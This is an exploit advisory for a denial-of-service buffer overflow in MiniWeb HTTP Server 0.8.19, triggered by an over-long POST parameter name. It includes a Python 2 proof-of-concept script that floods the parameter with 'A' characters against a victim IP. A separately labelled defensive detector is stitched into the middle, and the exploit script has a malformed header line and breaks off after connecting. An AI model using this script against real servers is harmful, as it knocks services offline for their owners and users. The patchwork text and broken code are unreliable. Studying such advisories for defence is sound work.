MiniWeb HTTP Server version 0.8.19 buffer overflow proof of concept exploit.

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team -


MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.


The vulnerability is in the handling of the name of the first parameter of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
If we send a large number of "A" characters as "PARAM_NAME1", the MiniWeb server will crash.
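
A defensive check for the condition described above, as an added example that is not part of the original advisory: it flags form-encoded POST bodies whose parameter names exceed a length limit, as a filter in front of the server or a log-analysis rule might. The function names, the 256-byte limit, the host name and the sample requests are assumptions constructed for illustration.

```python
# Added example (not from the original advisory): flag over-long parameter
# names in an application/x-www-form-urlencoded POST body.
MAX_NAME_LEN = 256  # assumed policy limit, not a MiniWeb constant


def oversized_param_names(raw_request: bytes, max_len: int = MAX_NAME_LEN):
    """Return [(position, name_length)] for parameter names longer than max_len."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        return []  # incomplete request: no header/body boundary found
    lines = head.split(b"\r\n")
    if not lines[0].upper().startswith(b"POST "):
        return []
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().lower()] = value.strip().lower()
    ctype = headers.get(b"content-type", b"")
    if not ctype.startswith(b"application/x-www-form-urlencoded"):
        return []
    findings = []
    for pos, pair in enumerate(body.split(b"&")):
        name = pair.partition(b"=")[0]  # text before the first "="
        if len(name) > max_len:
            findings.append((pos, len(name)))
    return findings


def build_request(first_name: bytes) -> bytes:
    """Constructed sample request, shaped like the one in the advisory."""
    body = first_name + b"=param_data1&param_name2=param_data2"
    return (b"POST /index.html HTTP/1.1\r\n"
            b"Host: test.invalid\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


if __name__ == "__main__":
    print(oversized_param_names(build_request(b"PARAM_NAME1")))  # normal name
    print(oversized_param_names(build_request(b"A" * 2038)))     # over-long name
```
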

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here:



import socket
import sys
import struct

if len(sys.argv) != 2:
    print "[+] Usage : python [VICTIM_IP]"
    sys.exit(1)  # stop here instead of failing on sys.argv[1] below

TCP_IP = sys.argv[1]
TCP_PORT = 8000

xx = "A"*2038 #4085

http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host:"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."